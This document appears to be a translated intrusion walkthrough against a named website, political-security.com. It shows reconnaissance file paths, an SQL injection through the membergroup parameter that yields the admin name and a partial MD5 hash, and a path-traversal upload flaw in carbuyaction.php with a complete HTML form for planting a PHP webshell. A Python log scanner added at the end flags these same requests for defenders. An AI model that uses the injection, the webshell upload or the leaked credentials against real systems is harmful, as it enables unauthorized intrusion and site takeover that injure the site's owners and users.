① Injection vulnerability.

This site: http://www.political-security.com/

First visit the "/data/admin/ver.txt" page to get the system's last upgrade time.

www.political-security.com/data/mysql_error_trace.inc reveals the admin backend.

Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; as the screenshot shows, the vulnerability exists.

Then enter the statement.

View the admin account:

http://www.political-security.co ... &membergroup=@`
admin
View the admin password:

http://www.political-security.co ... &membergroup=@`

8d29b1ef9f8c5a5af429
The result is 19 characters long; remove the first three and the last one to get the admin's 16-character MD5:

8d2
9b1ef9f8c5a5af42
cmd5 couldn't crack it, so I had to try the second method.
② Upload vulnerability:
Simply log in to the member center, then visit the page link
"/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post"

As the screenshot shows, the upload page "/dialog/select_soft_post" has been successfully invoked through "/plus/carbuyaction.php".
So change the extension of the PHP one-line webshell to "rar" or similar, and submit it using the submission page upload1.htm:

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
  file:<input name="uploadfile" type="file" /><br>
  newname:<input name="newname" type="text" value="myfile.Php"/>
  <button class="button2" type="submit">提交</button><br><br>
</form>
Or:

The upload then succeeds.
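From the defender's side, the request patterns in both sections above are easy to spot in web-server access logs. The following Python script is an added example, not part of the original post: it parses combined-format log lines and flags reads of ver.txt and mysql_error_trace.inc, a non-numeric membergroup value sent to ajax_membergroup.php, and a path traversal in the rs[code] parameter of carbuyaction.php. The log lines are constructed samples with placeholder client addresses, and the indicator names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format). Client addresses
# are documentation-range placeholders, not taken from the original post.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /data/admin/ver.txt HTTP/1.1" 200 12
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /data/mysql_error_trace.inc HTTP/1.1" 200 830
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 44
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60 HTTP/1.1" 200 61
203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs%5Bcode%5D=../dialog/select_soft_post HTTP/1.1" 200 2210
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "POST /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post HTTP/1.1" 200 97
"""

# Extracts the method and request target from the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return the list of indicator names triggered by one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # parse_qs percent-decodes keys and values, so rs%5Bcode%5D becomes rs[code].
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = []

    # Reconnaissance files from the post: the upgrade timestamp and the
    # MySQL error trace file that can leak the admin directory name.
    if path.endswith("/data/admin/ver.txt"):
        hits.append("recon:ver.txt")
    if path.endswith("/data/mysql_error_trace.inc"):
        hits.append("recon:mysql_error_trace.inc")

    # membergroup is expected to be a plain integer; anything else (such as
    # the @` value used in the post) is an injection attempt.
    if path.endswith("/member/ajax_membergroup.php"):
        if any(not v.isdigit() for v in params.get("membergroup", [])):
            hits.append("sqli:membergroup")

    # rs[code] selects an include file; "../" in it redirects carbuyaction.php
    # to an arbitrary script such as dialog/select_soft_post.
    if path.endswith("/plus/carbuyaction.php"):
        for value in params.get("rs[code]", []):
            if "../" in value or "..\\" in value or "select_soft_post" in value.lower():
                hits.append("lfi:carbuyaction_rs_code")
                break
    return hits


def scan_log(text):
    """Scan access-log text; return (line_number, method, indicators) per hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            findings.append((lineno, m.group("method"), hits))
    return findings


if __name__ == "__main__":
    for lineno, method, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {method} -> {', '.join(hits)}")
```

Running it on the sample log reports lines 2, 3, 5, 6 and 7; the legitimate membergroup=1 request on line 4 is not flagged. The matching is done on the decoded path and query, so single-level percent-encoding of the parameter name or the traversal sequence does not evade it; double encoding would need an extra unquote pass before the check.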